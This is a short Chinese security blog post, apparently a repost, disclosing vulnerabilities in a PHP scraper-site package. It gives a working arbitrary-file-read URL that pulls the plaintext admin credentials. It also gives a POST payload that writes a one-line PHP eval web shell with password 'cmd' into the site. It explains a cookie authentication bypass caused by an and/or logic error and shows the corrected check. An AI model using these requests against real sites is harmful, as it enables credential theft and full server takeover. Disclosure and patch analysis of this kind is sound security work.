好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

搜搜问问小偷程序天宇版 前台任意文件读取 后台

打算用小偷程序做一个网站的就下载了一套程序结果就悲剧了   下载地址:http://www.2cto.com/ym/201203/31432.html   1、前台任意文件读取漏洞:   img.php文件代码   <?php $p=$_GET['p']; $pics=file($p); for($i=0;$i< count($pics);$i++) { echo $pics[$i]; } ?> 典型任意文件读取没有任何验证   利用方法:/img.php?p=./admin/data.php   读取管理员帐号密码 明文的哦   2、后台任意代码写入:   admin_ad.php 最后一段代码   <? }elseif ($_GET['action']=="add"){         //echo $_POST['js_mb'];         $file="ad/".$_POST['js_file'];         $fp=fopen($file,"w");         fwrite($fp,stripslashes($_POST['js_mb']));         fclose($fp);         echo"<script>alert('修改成功!');location.href='?id=ad';</script>"; } ?> 利用 发送POST数据   path:/admin/admin_ad.php?action=add   POST数据包:js_file=x.php&js_mb=<?php eval($_POST[cmd]);?>   既可在网站ad 目录下生成一个x.php的一句话木马 密码cmd   该文件头部,验证不足:   <? include('data.php'); if($_COOKIE['x_Cookie']!=$adminname and $_COOKIE['y_Cookie']!=$password){         echo"<script>location.href='index.php';</script>";         exit; } ?> 逻辑错误知道其一即可绕过 www.2cto.com   转自:http://www.90sec.org/thread-1704-1-1.html,内容有修改。   后台的权限验证问题,设置Cookie:x_Cookie=用户名 或y_Cookie 等于密码即可通过验证   if($_COOKIE['x_Cookie']!=$adminname and $_COOKIE['y_Cookie']!=$password){   这个逻辑漏洞很狗血,作者一定是蛋爆了才会这么写……   正确的应该为:   if($_COOKIE['x_Cookie']!=$adminname or $_COOKIE['y_Cookie']!=$password){   或者:   if($_COOKIE['x_Cookie']==$adminname and $_COOKIE['y_Cookie']==$password){       作者 Nuclear'Atk 网络安全 研究中心

查看更多关于搜搜问问小偷程序天宇版 前台任意文件读取 后台的详细内容...

  阅读:35次